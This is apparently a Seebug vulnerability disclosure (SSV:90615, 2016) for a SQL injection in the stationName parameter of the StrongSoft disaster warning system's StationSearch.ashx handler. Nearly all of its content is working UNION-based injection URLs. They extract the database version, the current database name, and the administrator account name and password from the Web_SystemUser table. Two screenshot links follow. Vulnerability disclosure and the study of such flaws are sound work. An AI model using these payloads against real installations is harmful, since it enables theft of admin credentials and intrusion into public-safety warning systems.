StrongSoft灾害预警系统 /Report/AjaxHandle/StationChoose/StationSearch.ashx stationName 参数SQL注入漏洞

2016-01-26T00:00:00
ID SSV:90615
Type seebug
Reporter 哆啦A梦
Modified 2016-01-26T00:00:00

Description

``` 注入链接:/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=1&stationType='KKK'&sqlWhere=

注入参数:stationName

【获取数据库版本】/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=')+and+1=2++union+all+select+(@@version),NULL--&stationType='KKK'&sqlWhere=

【获取当前数据库】/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=')+and+1=2++union+all+select+(db_name()),NULL--&stationType='KKK'&sqlWhere=

【管理员账号密码】/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=')+and+1=2++union+all+select+(select+top+1+UserID%2b'|'%2bUserPwd+from+strongmain.dbo.Web_SystemUser),NULL--&stationType='KKK'&sqlWhere= ```

![](https://images.seebug.org/contribute/859f1888-a233-46de-b7b0-dc6f3e0ae050-屏幕快照 2016-01-15 下午11.32.05.png)

![](https://images.seebug.org/contribute/c9898cd0-91e7-4092-8f8b-30ea30b0269a-屏幕快照 2016-01-15 下午11.32.34.png)